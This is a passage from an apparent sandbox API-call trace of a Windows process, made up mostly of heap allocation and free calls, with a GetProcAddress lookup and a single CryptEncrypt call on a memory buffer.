(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0259.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0259.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0259.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0259.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0259.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0259.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0259.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0259.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0259.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0259.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0259.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0259.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0259.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0259.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0259.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0259.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0259.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa512) returned 0x2f3d490 [0259.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3d490 | out: hHeap=0x970000) returned 1 [0259.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0259.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e565e8 [0259.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0259.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0259.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0259.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0259.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0259.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0259.844] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0259.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0259.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0259.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0259.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0259.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0259.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0259.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0259.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0259.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0259.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0259.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0259.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0259.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0259.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0259.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0259.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0259.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51df0 [0259.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51df0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0259.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.847] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0259.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e541e8 [0259.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0259.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0259.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0259.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0259.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0259.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0259.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0259.847] CryptEncrypt (in: hKey=0xa87490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f32f70*, pdwDataLen=0x8cef60*=0xa512, dwBufLen=0xa518 | out: pbData=0x2f32f70*, pdwDataLen=0x8cef60*=0xa518) returned 1 [0259.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0259.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0259.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0259.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0259.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0259.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0259.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0259.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0259.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0259.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0259.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0259.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0259.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0259.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52198 | out: hHeap=0x970000) returned 1 [0259.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0259.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fd0 [0259.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f70 [0259.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520d8 [0259.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0259.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0259.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f70 | out: hHeap=0x970000) returned 1 [0259.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.851] HeapFree (in: hHeap=0x970000, 